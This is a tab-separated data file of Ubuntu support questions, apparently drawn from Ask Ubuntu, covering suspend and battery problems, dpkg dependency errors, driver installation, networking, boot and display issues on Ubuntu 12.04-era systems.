157563	slice battery causing suspend and power issues on lenovo x1	i have a lenovo x1 i5vpro 2.50gh x 4 , which works fine with 12.04 lts 64 ... . except the right click on the touch-pad , which i can live with.. however , i have just bought a genuine lenovo 39+ slice to extend usage . if i boot with the slice attached i have two strange events : the battery shows as one battery so i ca n't tell the state of the internal batteries from the slice . if i then suspend by closing the lid when i open it again the screen is black with just the mouse pointer . i have tried just typing my password but it just sits there and does nothing . if i boot with no slice attached all is well and works fine . if i then attach the slice the slice is detected and shows as another battery so can see the state of both . however , the time left is shown in % of charge and not time left before flat . the other strange thing is that with the two batteries showing if i check the power statistics they are shown as separate batteries with their own statistics . however , if booted with the slice on and showing only one battery attached the power statistics falters and show nothing despite the batteries both being there ans showing as 100 % next to the icon next to the bluetooth icon .
157568	disable password authentication to set proxy information	to set up/change proxy settings on ubuntu 12.04 ( gnome 3 ) , i have to provide my admin password . is it possible to disable this authentication ? i do n't need that any user could change it , just that i could change the proxy settings without being prompt my password ...
157574	how can i turn my desktop ubuntu 8.04 into a command line only install ?	the question says it all really . i had a problem with the 8.04 alternative install .iso ( which after some research is a well known bug ) so i had to install the full desktop version . i know i can switch off the gui functionality and prevent it loading at start up , but is it safe to remove all gui components , and if so how do i do it ? if i am able to do this will the resulting system be stable ? ?
157589	what layout should i use with this odd keyboard ?	i ca n't find the right keyboard layout to use for my keyboard . on the bottom left are these keys in this order : ctrl , windows , alt , | , space that 4th key is what makes it weird . i selected `` generic 104 keyboard , '' but when i press that key it 's either < or > . it 's a zippy wk-725 . what keyboard layout should i use so that that key is correctly detected ?
157594	can i make a launcher shortcut perform different actions based on a condition	what i want to do is pretty simple to understand . i want the same launcher shortcut to act like a on/off swith for eg . like suppose i have made a launcher to start lampp with the command gksudo /opt/lampp/lampp start this works properly to start lampp . now , what i want to do is , if lampp is not on , the launcher should execute the above command and start lampp.while if lampp is on , i want ti to execute the command gksudo /opt/lampp/lampp stop and stop lampp . i want these 2 commands to be executed by the same launcher where the command to be executed is decided on the basis of a condition ( lampp being on or off in the above example ) can i do this ? and how ? i guess writing a bash script and then making the launcher execute the bash script would do it.but then how do i check weather lampp is on of off ?
157598	how to install ubuntu without a cd and a usb ?	i want to install ubuntu without using either of the following : cd usb
157607	software center is broken	when i started installing the humble indie bundle 5 games the software center stopped working and now i get this error . packages can not be installed or removed , click here to repair . which fails and gives these results . installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 255502 files and directories currently installed . ) unpacking libqtcore4 : i386 ( from ... /libqtcore4_4 % 3a4.8.1-0ubuntu4.1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libqtcore4_4 % 3a4.8.1-0ubuntu4.1_i386.deb ( -- unpack ) : conffile './etc/xdg/trolltech.conf ' is not in sync with other instances of the same package no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/libqtcore4_4 % 3a4.8.1-0ubuntu4.1_i386.deb error in function : dpkg : dependency problems prevent configuration of libqtgui4 : i386 : libqtgui4 : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . dpkg : error processing libqtgui4 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-sql : i386 : libqt4-sql : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . dpkg : error processing libqt4-sql : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of ia32-libs-multiarch : i386 : ia32-libs-multiarch : i386 depends on libqt4-sql ; however : package libqt4-sql : i386 is not configured yet . ia32-libs-multiarch : i386 depends on libqtcore4 ; however : package libqtcore4 : i386 is not installed . ia32-libs-multiarch : i386 depends on libqtgui4 ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing ia32-libs-multiarch : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-declarative : i386 : libqt4-declarative : i386 depends on libqt4-sql ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-sql : i386 is not configured yet . libqt4-declarative : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . libqt4-declarative : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-declarative : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-svg : i386 : libqt4-svg : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . libqt4-svg : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-svg : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-network : i386 : libqt4-network : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . dpkg : error processing libqt4-network : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-sql-mysql : i386 : libqt4-sql-mysql : i386 depends on libqt4-sql ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-sql : i386 is not configured yet . libqt4-sql-mysql : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . dpkg : error processing libqt4-sql-mysql : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-script : i386 : libqt4-script : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . dpkg : error processing libqt4-script : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-dbus : i386 : libqt4-dbus : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . dpkg : error processing libqt4-dbus : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-opengl : i386 : libqt4-opengl : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . libqt4-opengl : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-opengl : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqtwebkit4 : i386 : libqtwebkit4 : i386 depends on libqt4-network ( > = 4:4.8.0~ ) ; however : package libqt4-network : i386 is not configured yet . libqtwebkit4 : i386 depends on libqtcore4 ( > = 4:4.8.0~ ) ; however : package libqtcore4 : i386 is not installed . libqtwebkit4 : i386 depends on libqtgui4 ( > = 4:4.8.0 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqtwebkit4 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-designer : i386 : libqt4-designer : i386 depends on libqt4-script ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-script : i386 is not configured yet . libqt4-designer : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . libqt4-designer : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-designer : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of lonesurvivor-bin : i386 : lonesurvivor-bin : i386 depends on ia32-libs-multiarch ; however : package ia32-libs-multiarch : i386 is not configured yet . dpkg : error processing lonesurvivor-bin : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of lonesurvivor : lonesurvivor depends on lonesurvivor-bin ( = 1.11d-0ubuntu5 ) ; however : package lonesurvivor-bin is not installed . package lonesurvivor-bin : i386 is not configured yet . dpkg : error processing lonesurvivor ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-scripttools : i386 : libqt4-scripttools : i386 depends on libqt4-script ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-script : i386 is not configured yet . libqt4-scripttools : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . libqt4-scripttools : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-scripttools : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-qt3support : i386 : libqt4-qt3support : i386 depends on libqt4-designer ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-designer : i386 is not configured yet . libqt4-qt3support : i386 depends on libqt4-network ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-network : i386 is not configured yet . libqt4-qt3support : i386 depends on libqt4-sql ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-sql : i386 is not configured yet . libqt4-qt3support : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . libqt4-qt3support : i386 depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtgui4 : i386 is not configured yet . dpkg : error processing libqt4-qt3support : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-xml : i386 : libqt4-xml : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . dpkg : error processing libqt4-xml : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-test : i386 : libqt4-test : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . dpkg : error processing libqt4-test : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-xmlpatterns : i386 : libqt4-xmlpatterns : i386 depends on libqt4-network ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqt4-network : i386 is not configured yet . libqt4-xmlpatterns : i386 depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.1 ) ; however : package libqtcore4 : i386 is not installed . dpkg : error processing libqt4-xmlpatterns : i386 ( -- configure ) : dependency problems - leaving unconfigured i could n't get the apt-get update or upgrade to work either so i shut off the repositories and updated / upgraded one at a time without any problems . but that did n't fix the software center . help would be greatly appreciated . added update i 've tried to install aptitude using dpkg but ca n't . i have also tried sudo apt-get dist-upgrade sudo apt-get autoremove sudo dpkg -- configure -a -- force-all and the -f options . though i believe this is where my problem is originating : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libqtcore4 : i386 the following new packages will be installed : libqtcore4 : i386 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/2,061 kb of archives . after this operation , 9,041 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 255526 files and directories currently installed . ) unpacking libqtcore4 : i386 ( from ... /libqtcore4_4 % 3a4.8.1-0ubuntu4.1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libqtcore4_4 % 3a4.8.1-0ubuntu4.1_i386.deb ( -- unpack ) : conffile './etc/xdg/trolltech.conf ' is not in sync with other instances of the same package errors were encountered while processing : /var/cache/apt/archives/libqtcore4_4 % 3a4.8.1-0ubuntu4.1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i hope this helps narrow it down some . second update sudo apt-get -- reinstall install software-center -f the following packages have unmet dependencies : ia32-libs-multiarch : i386 : depends : libqtcore4 : i386 but it is not going to be installed libqt4-dbus : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-declarative : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-designer : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-network : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-opengl : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-qt3support : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-script : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-scripttools : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-sql : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-sql-mysql : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-svg : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-test : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-xml : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqt4-xmlpatterns : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqtgui4 : i386 : depends : libqtcore4 : i386 ( = 4:4.8.1-0ubuntu4.1 ) but it is not going to be installed libqtwebkit4 : i386 : depends : libqtcore4 : i386 ( > = 4:4.8.0~ ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . sudo apt-get -f install does n't work either . complete output of terminal for step 5 of this procedure can be found here : http : //paste.ubuntu.com/1066192/
157613	can not start webhttrack	i am trying to start my webhttrack on ubuntu 12.04 precise pangolin but all i get is the opening screen . when i press any button on the page it gives me the following errors : oops ! google chrome could not connect to barney:8081 suggestions : try reloading : barney : â­8081/â­server/â­step2.â­html i tried to run from a terminal window and get the output here : webhttrack /usr/bin/webhttrack ( 4405 : ( launching /usr/bin/x-www-browser /usr/bin/webhttrack ( 4405 : ( spawning regular browser.. created new window in existing browser session . /usr/bin/webhttrack ( 4405 : ( browser exited /usr/bin/webhttrack : line 167 : 4422 killed $ { binpath } /htsserver `` $ { distpath } / '' path `` $ { home } /websites '' lang `` $ { langn } '' $ @ if anyone can help me i appreciate it .
157615	how do i stop being offered updates for pae kernels ?	i am using ubuntu 12.04 . i do n't want to use pae kernels so i am using normal kernels . but update manager giving me updates regarding pae kernels and i dont want them . so can i stop update manager about listing the updates regarding pae kernels . thank you .
157616	unity torrents lens not working	the unity torrents lens is not working for me . if i select it and search for , say , ubuntu , i do not get any results . is it not working in general ( since pirate bay is down or something ) or is this a problem of my computer ? i am running ubuntu 12.04 .
157617	reverting from ctrl - alt - f1	i tried to install an nvidia driver and there was an error saying i must not be in an x terminal when doing so . so i did a ctrl+alt+f1 . the resulting terminal did not allow the nvidia driver to be installed and showed the same error message . how do i revert back to the unity gui ?
157618	deleted entire harddisk . now my laptop wo n't boot anything and stuck at grub rescue !	my laptop is dell inspiron n4030 . i used to use ubuntu 12.04 and it was on the entire hard drive . i tried to install windows 7 but my laptop could n't install it . so , i decided to delete the entire hard drive and do a fresh install of windows 7 . but after deletion i immediately removed the gparted live usb which i was using to delete the partitions of my hard drive . and then tried booting from windows 7 cd , did n't work , tried ubuntu live cd , did n't work , tried hiren 's boot cd , did n't work , tried super grub disk , did n't work . probably i 'm not doing it right . help needed badly .
157628	m-audio delta 1010lt on 12.04	i have 12.04 64bit installed , my soundcard is a delta 1010lt , it seems to be partially detected , i 've been following steps here : https : //help.ubuntu.com/community/soundtroubleshooting/ lspci -v | grep -a7 -i `` audio '' shows this : 04:07.0 multimedia audio controller : via technologies inc. ice1712 [ envy24 ] pci multi-channel i/o controller ( rev 02 ) subsystem : via technologies inc. m-audio delta 1010lt flags : bus master , medium devsel , latency 64 , irq 22 i/o ports at ec00 [ size=32 ] i/o ports at e880 [ size=16 ] i/o ports at e800 [ size=16 ] i/o ports at e480 [ size=64 ] capabilities : < access denied > kernel driver in use : snd_ice1712 aplay shows this : **** list of playback hardware devices **** card 0 : m1010lt [ m audio delta 1010lt ] , device 0 : ice1712 multi [ ice1712 multi ] subdevices : 1/1 subdevice # 0 : subdevice # 0 in the sound settings on the desktop all i see is the ice1712 s/pdif , which i do n't use , i want to use the individual outputs on the card , i 'm not so bothered about inputs , i just want the playback for now . if i open alsamixer in the console , i see all of the output and input channels , i 've raised the volume on them but i do n't get anything in the sound settings on the desktop and when i play any sound , i hear nothing . can someone help ?
157629	how to prevent computer from automatically sleeping and/or hibernating ?	i 'm running ubuntu 12.04 , and my laptop* wo n't wake from sleep/suspend/hibernate . ( is sleep the same thing as suspend ? ) i 'm not even sure which of these things it 's doing . when i am done working for the day , i lock my screen ( control-alt-l ) . when i come back the next day , the screen is in power saving mode , and no amount of typing or clicking ( on the usb keyboard/mouse or the builtin keyboard/trackpad ) nor tapping the power button will bring it back to life . the only way i can get my machine to work is to hold down the power button until it shuts off , then press the power button again to turn it back on . obviously , anything i had open from the previous day is pretty much gone -- in particular , my vms all get rudely shut down without any warning . this is driving me insane . i spend the first hour of every work day trying to figure out how to get my computer to stop locking up over night . what i 've tried : editing the org.freedesktop.upower.policy to disable suspend and hibernate . setting power management options in `` power '' section of `` system settings '' . looking at all power management options in the bios ( none appear to be relevant to sleep/suspend/hibernate ) . reading every forum post/askubuntu post that i can find that 's even tangentially related to the subject . add acpi=off to kernel args . ( results in usb keyboard and mouse not working , so i did n't wait to see if it fixes the suspend . ) add apm=off to kernel args . my question : how to disable the automatic sleep and/or hibernate ( and/or anything similar ) in ubuntu 12.04 . i do n't care if it 's still possible to sleep/suspend/hibernate/whatever by pushing buttons or running some command or reciting led zeppelin lyrics backwards . i just want my laptop to be ready for work in the morning . *the laptop is a dell latitude something or other . i do n't want to get too specific because i 've seen a lot of similar questions get closed for being too specific . i think my question is generic enough to stand -- it 's a question about the latest , stable version of ubuntu . link to dmesg link to /var/log/kern.log edit : nothing i 've tried so far has prevented ubuntu from sleeping at night , and when it does sleep , nothing i have tried can reliably get it to wake back up . i 've seen a few posts that say buggy video drivers can cause problems with waking . last night , on a hunch , i tried switching to console ( ctrl+alt+1 ) before leaving work , just to see what would happen . this morning when i woke up the computer , it instantly woke up back to the console . i switched over to gnome ( ctrl+alt+7 ) and although the screen looked frozen , i typed my password , pressed enter , and made some coffee . when i got back a few minutes later , my desktop was ready , just like i left it last night . i 'm going to keep trying this to see if this is a reliable solution . edit 2 : no dice . switching to the console after logging out does nothing for me ... still have to reboot my computer each morning . it 's driving me nuts ... i ca n't believe how erratic suspend is on ubuntu . or the fact that it ca n't simply be disabled .
157631	need a non-x terminal for the nvidia driver installation	when i try to install the nvidia driver for my video card , i receive an error message . error : you appear to be running an x server ; please exit x before installing . for further details , please see the section installing the nvidia driver in the readme available on the linux driver download page at www.nvidia.com . i was n't able to find the readme on the website but how do i create a terminal that is non-x ? i am on 12.04 .
157638	unavailable packages repository	i 'm running ubuntu 11.10 ( oneiric ) on this machine , and suddenly , apt is unable to update properly . if i ask it to update its package information , by running apt-get update ( or alternatively telling the update manager to `` check '' ) , it succeeds for about 120 packages ( more precisely , i get about 120 ign/hit notes ) and then says it can not find universe sources and restricted amd64 : hit http : //de.archive.ubuntu.com oneiric-backports/multiverse translation-en hit http : //de.archive.ubuntu.com oneiric-backports/restricted translation-en hit http : //de.archive.ubuntu.com oneiric-backports/universe translation-en err http : //de.archive.ubuntu.com oneiric/universe sources 404 not found [ ip : 141.30.13.20 80 ] err http : //de.archive.ubuntu.com oneiric/restricted amd64 packages 404 not found [ ip : 141.30.13.20 80 ] w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/oneiric/universe/source/sources 404 not found [ ip : 141.30.13.20 80 ] w : failed to fetch http : //de.archive.ubuntu.com/ubuntu/dists/oneiric/restricted/binary-amd64/packages 404 not found [ ip : 141.30.13.20 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . i manually checked the de server and can not find anything wrong with the stuff it 's complaining about . also it looks pretty much like , say , the us mirror . but oddly enough , the ip it lists , seems to point to a debian package server , which obviously does not contain ubuntu packages . so , how can i fix this ?
157640	how can i change the port of remote desktop ?	how can i change the port of ubuntu 's built in remote desktop ?
157644	is there an anonymous proxy application for ubuntu ?	i 've been digging around to find a proxy application something like proxifier in windows but can not find any thing ! and then tried to configure the system wide proxy setting in network section of ubuntuâs system setting and i configure the proxy setting but it seems it does not apply anything ... here is my questions : is there any proxy application to use like proxifier in windows ! ? if there is no proxy application how can i configure system 's proxy setting manually ! ? thanks in advance
157651	no internet in 12.04 or 11.10 neither on wired nor wireless	i just installed kubuntu 12.04 on a new computer with an asus motherboard containing onboard nic . the onboard nic is enabled in bios . i do n't happen to have a spare network card to test with . the internet connection is via a d-link router , either wired or wireless via t-link usb wireless adapter . the internet connection works fine for other computers on the network ( 2 wired and 1 wireless ) . i have tried multiple known-good cables and router ports with this computer . i also booting into kubuntu 11.10 livecd to test there as well , same results . this machine will not connect to the internet . on the wired connection in 12.04 : shelly @ neptune : ~ $ sudo service networking status networking stop/waiting shelly @ neptune : ~ $ sudo service networking restart stop : unknown instance : networking stop/waiting shelly @ neptune : ~ $ ping google.com ping : unknown host google.com shelly @ neptune : ~ $ ping 127.0.0.1 ping 127.0.0.1 ( 127.0.0.1 ) 56 ( 84 ) bytes of data . 64 bytes from 127.0.0.1 : icmp_req=1 ttl=64 time=0.027 ms 64 bytes from 127.0.0.1 : icmp_req=2 ttl=64 time=0.019 ms 64 bytes from 127.0.0.1 : icmp_req=3 ttl=64 time=0.017 ms 64 bytes from 127.0.0.1 : icmp_req=4 ttl=64 time=0.027 ms 64 bytes from 127.0.0.1 : icmp_req=5 ttl=64 time=0.018 ms 64 bytes from 127.0.0.1 : icmp_req=6 ttl=64 time=0.021 ms 64 bytes from 127.0.0.1 : icmp_req=7 ttl=64 time=0.019 ms ^c -- - 127.0.0.1 ping statistics -- - 7 packets transmitted , 7 received , 0 % packet loss , time 5997ms rtt min/avg/max/mdev = 0.017/0.021/0.027/0.004 ms shelly @ neptune : ~ $ ifconfig eth0 link encap : ethernet hwaddr 54:04 : a6:82:6b : eb inet6 addr : fe80 : :5604 : a6ff : fe82:6beb/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6 errors:0 dropped:0 overruns:0 frame:0 tx packets:230 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:360 ( 360.0 b ) tx bytes:50506 ( 50.5 kb ) interrupt:46 base address:0xe000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:134 errors:0 dropped:0 overruns:0 frame:0 tx packets:134 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:10616 ( 10.6 kb ) tx bytes:10616 ( 10.6 kb ) shelly @ neptune : ~ $ lshw -c network warning : you should run this program as super-user . *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 06 serial : 54:04 : a6:82:6b : eb size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 multicast=yes port=mii speed=100mbit/s resources : irq:46 ioport : e000 ( size=256 ) memory : d0004000-d0004fff memory : d0000000-d0003fff warning : output may be incomplete or inaccurate , you should run this program as super-user . shelly @ neptune : ~ $ sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 06 serial : 54:04 : a6:82:6b : eb size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:46 ioport : e000 ( size=256 ) memory : d0004000-d0004fff memory : d0000000-d0003fff shelly @ neptune : ~ $ sudo service network-manager status network-manager start/running , process 823 shelly @ neptune : ~ $ sudo service network-manager restart network-manager stop/waiting network-manager start/running , process 1684 shelly @ neptune : ~ $ lsmod | grep -i r8169 r8169 62099 0 shelly @ neptune : ~ $ edit : it turns out that instead of the detected r8169 lan card , this motherboard uses an 8111e as discovered here . so that is the solution .
157653	how to create a deb package that adds ppa then installs another package ?	i 'm looking for a single click solution to add a ppa then install a package in that ppa as the apturl method is disabled for security reasons . i 'm wanting to create a .deb file that adds my ppa then installs a package ( another.deb ) from my ppa . all in one step . similar to the way that getdeb/playdeb has a repository add .deb etc .
157654	visualboy advance game colour problem - ubuntu 12.04	i just downloaded visualboy advance from the ubuntu software center for the first time to play a rom , to be specific pokemon firered , which i downloaded from coolroms . when i run the rom i see the wrong colors showing up , the rom runs fine though . i 've played the game loads of times before and am sure it 's not like this and no i can not ignore it and continue playing as it ruins the game as well as my mood to play it . i searched for a while over the net and found this it has the exact problem i am experiencing but that does n't solve it as he shifted his ubuntu version and got it to work , but i want to stick to mine ( 12.04 ) so any help ?
157655	wine entries persist after uninstall wine	i updated to 12.04 from 11.10 recently and i had a few problems i solved without much effort . but one thing is still bothering me . i uninstalled wine ( and removed the .wine directory ) but the entries in the zeitgeist still appear . does anyone know how delete it ?
157661	fix resolution on ubuntu 12.04 ( 1440x900 )	i 'm pretty new to ubuntu and i 'm trying to get the correct resolution on my monitor . i have ubuntu 12.04 so it has xorg 7.5 which is not supported by ati anymore for my ati radeon xpress 200 graphics as far as i can tell . i was told to go to the software center and download ati binary x.org driver , so i did that and it gave me a couple more resolution options , but none of them are the correct 1440x900 resolution of my monitor . is there any way to get the correct resolution to show up ? !
157667	make ubuntu first option when dual booting	i have windows 7 and ubuntu installed . when rebooting i always have to choose between those 2.how can i make ubuntu become the first option when i boot my computer ?
157668	updates in libreoffice in main repository	why does lo in the main repository do n't keep up with the latest libreoffice version ? 3.5.4 offers for example huge improvements in speed . unless the packages gets updated in the main repository most users wont see the new build . i know there is a ppa , but sometimes it breaks things ( for example the 3.5.5 rc2 amd64 build is stuck ( since yesterday ! ! ) in building because of low storage space https : //launchpad.net/~libreoffice/+archive/ppa/+build/3609969 )
157670	ubuntu 3d in incompatible card due to an error ?	this is really weird xd i have ubuntu 12.04 , my graphic chip is a mother board integrated via chrome9 , which is incompatible with unity 3d , so i was looking for a dock in order to replace unity 2d , that was my experience : cairo ( opengl ) : i tried first with cairo ( w/opengl ) , nice and very configurable dock but it suddenly got freezed after some minutes everytime i used it , about 8 times in diferent de ( gnome , classic gnome , xubuntu , cairo ( without unity ) ... ) . docky : then i installed docky , it was cool , pretty lightweight and fast , i made everything trying to make it crash as cairo did before but i could n't , the only two things i do n't like is i ca n't get rid of the anchor and it does n't have an app search plugin . so , i installed ... docky + gnome do : after seen how well docky worked and i missed the app search feature i installed gnome do , thinking it was going to be pretty cool and my definitive `` unity killer '' ... but after rebooting gnome do crashed my pc about 20 times at startup , it popped up a password request to acces my passwords in gnome ( message was in spanish so i do n't know how it is called exactly ) but i could not introduce any password and the desktop was totally blocked , just ( prnt scrn+allt gr+o ) could take me out of there , i solved the problem by entering in xubuntu and opening chromium before gnome do loaded , once i had unblocked my passwords with chromium i could uninstall gnome do , to never install it again . ( note : chromium asks me to unblock my passwords because i have them encrypted ) unity 3d : ... o.o that was totally unespected , i logged in in gnome desktop with my docky at my left side , i was surfing in internet , when wild messages appear , first a metacity error , ok , then pops up a compiz error , hmmm ok , but then unity 3d appeared at my left and i was shocked 0.0 because supposedly my video chip ( mobo integrated via chrome9 ) is not compatible with unity 3d for some reason , it demonstrates it is n't imposible but i think there might be a lack of interest about getting unity 3d working in every video chip . i 'd really like to know how was that posible . i 'm pretty sure i 'm using unity 3d because launcher did n't change color after changing background , besides it has some transparency , the `` light '' in icons is like the one i saw in some post right here , but there is something weird because when it happened icons in unity blurred when i opened dash , but now they do n't blur .
157674	how to format my hdd when installing ubuntu ?	how do i format the hard drive on my machine before installing ?
